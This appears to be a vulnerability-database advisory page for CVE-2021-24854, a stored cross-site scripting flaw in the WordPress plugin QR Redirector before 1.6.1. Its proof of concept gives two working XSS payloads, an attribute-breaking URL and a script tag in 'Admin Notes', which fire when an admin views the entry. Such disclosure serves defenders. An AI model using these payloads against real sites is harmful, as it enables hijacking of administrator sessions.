Lucene search
Apple502jWPEX-ID:0D422397-69FF-4D05-AAFA-7A572E460E5FHistoryOct 18, 2021 - 12:00 a.m.
QR Redirector < 1.6.1 - Contributor+ Stored Cross-Site Scripting
2021-10-1800:00:00
apple502j
268
contributor+ stored cross-site scripting
url redirection
admin notes
exploit
EPSS
0.001
Percentile
24.8%
The plugin does not sanitise and escape some of the QR Redirect fields, which could allow users with a role as low as Contributor perform Stored Cross-Site Scripting attacks.
As a contributor, create/edit a "QR Redirect" and set the following fields:
"URL to Redirect to": https://example.com/#" style="animation-name:rotation" onanimationend="alert(/XSS-URL/)//
"Admin Notes": </textarea><script>alert(/XSS-admin-notes/)</script>
The XSS will be triggered when any user access the QR Redirect (for example an admin reviewing it)Related
prion
prion
Cross site scripting
2021-11-17 11:15:00
patchstack
patchstack
cvelist
cvelist
cve
cve
CVE-2021-24854
2021-11-17 11:15:08
wpvulndb
wpvulndb
QR Redirector < 1.6.1 - Contributor+ Stored Cross-Site Scripting
2021-10-18 00:00:00
cnvd
cnvd
WordPress QR Redirector plugin cross-site scripting vulnerability
2021-11-21 00:00:00
nvd
nvd
CVE-2021-24854
2021-11-17 11:15:08